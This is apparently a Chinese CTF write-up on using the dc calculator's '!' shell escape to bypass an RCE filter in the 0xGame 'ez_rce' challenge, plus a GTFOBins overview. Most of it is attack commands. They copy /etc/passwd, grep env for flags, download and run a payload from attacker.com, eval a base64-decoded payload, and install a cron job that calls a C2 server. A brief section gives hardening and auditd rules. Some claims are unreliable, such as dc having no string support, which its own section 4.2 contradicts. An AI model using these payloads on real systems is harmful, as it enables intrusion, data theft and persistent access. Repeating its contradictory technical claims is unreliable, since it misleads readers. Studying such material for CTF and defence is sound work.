RCE绕过新思路:0xGame中dc计算器漏洞利用全解析(附GTFOBins实战指南)
RCE绕过新思路:dc计算器特性与GTFOBins实战指南
1. 理解dc计算器的独特价值
在Linux系统中,dc(desk calculator)是一款基于逆波兰表示法的命令行计算器工具。与常见的bc计算器不同,dc采用堆栈式运算逻辑,这种设计特性使其在特定场景下成为绕过RCE(远程代码执行)限制的绝佳跳板。
dc的核心特点包括:
- 无字符串处理能力:原生不支持字符串类型,所有输入均视为数值或操作符
- 堆栈操作模式:采用LIFO(后进先出)数据结构执行运算
- 命令执行接口:通过
!操作符可直接调用系统shell - 环境变量访问:支持通过特定语法读取系统变量
# 基础dc运算示例 echo "3 5 + p" | dc # 输出82. 0xGame中ez_rce题目的突破路径
分析题目环境时发现存在以下限制:
- 过滤了常见命令分隔符(; & |)
- 禁用引号等字符串标识符
- 黑名单包含bash、sh等shell关键字
2.1 关键绕过技术
利用dc的数值处理特性构造payload:
114 1000 * 514 + p # 数学运算:114*1000 + 514 = 114514 !ls -al / # 通过!执行系统命令技术要点:
- 数值运算作为干扰因子绕过关键字检测
!操作符后的命令不会被解析为字符串- 堆栈操作天然规避命令拼接检测
2.2 环境变量读取技巧
当需要获取敏感信息时:
# 通过系统变量获取信息 !echo $PATH !env | grep FLAG3. GTFOBins工具库的实战应用
GTFOBins(https://gtfobins.github.io/)收录了大量可用于权限提升和绕过限制的合法工具技巧。
3.1 常用功能模块
| 功能类别 | 代表命令 | 适用场景 |
|---|---|---|
| 文件操作 | !cp /etc/passwd . | 敏感文件复制 |
| 进程查看 | !ps aux | 系统进程分析 |
| 网络探测 | !netstat -tulnp | 端口与服务识别 |
| 权限提升 | !sudo -l | 检查sudo权限 |
3.2 典型利用链构造
# 分步执行复杂操作 114514 p # 干扰数值 !mkdir -p /tmp/exploit !cp /challenge/* /tmp/exploit !cd /tmp/exploit && ./vulnerable_bin4. 高级绕过技术精要
4.1 多进制混合运算
利用dc支持的多进制特性构造非常规payload:
# 八进制表示法 echo "8o 114 514 + p" | dc # 输出八进制结果 # 十六进制运算 echo "16i BFEB p" | dc # 将BFEB从16进制转为10进制4.2 堆栈操作与命令组合
通过堆栈操作实现复杂逻辑:
# 条件判断实现 echo "[shell命令]sx 1 0 =x" | dc # 当1=0时执行命令(实际不执行) echo "[shell命令]sx 1 1 =x" | dc # 条件成立时执行5. 防御对策与检测方案
针对此类攻击,防御方应考虑:
输入过滤增强:
- 禁用
!操作符 - 限制dc的寄存器操作
- 监控异常数值参数
- 禁用
环境加固:
# 限制dc权限 chmod 750 /usr/bin/dc setfacl -Rm u:www-data:- /usr/bin/dc日志监控规则:
# auditd规则示例 -a always,exit -F path=/usr/bin/dc -F perm=x -F auid>=1000 -F auid!=4294967295 -k dc_exec
6. 实战案例扩展
通过dc实现文件下载:
# 下载远程payload !curl http://attacker.com/exp.sh -o /tmp/exp !chmod +x /tmp/exp !/tmp/exp环境变量注入技巧:
# 通过环境变量传递参数 !export PAYLOAD=$(echo "YmFzaC..." | base64 -d) !eval $PAYLOAD7. 工具链整合建议
建议将dc技巧与其他工具结合使用:
与SQLite配合:
!sqlite3 /var/www/db.sqlite "SELECT * FROM users"网络探测组合:
!python3 -c 'import socket; socket.create_connection(("127.0.0.1", 22))'权限维持技术:
!echo '* * * * * curl http://c2.server.com/update' | crontab -
掌握dc计算器的特性利用方法,能为安全研究人员提供全新的测试视角,同时也提醒防御方需要关注非常规工具的潜在风险。建议在合法授权范围内实践这些技术,并持续关注GTFOBins等资源的最新更新。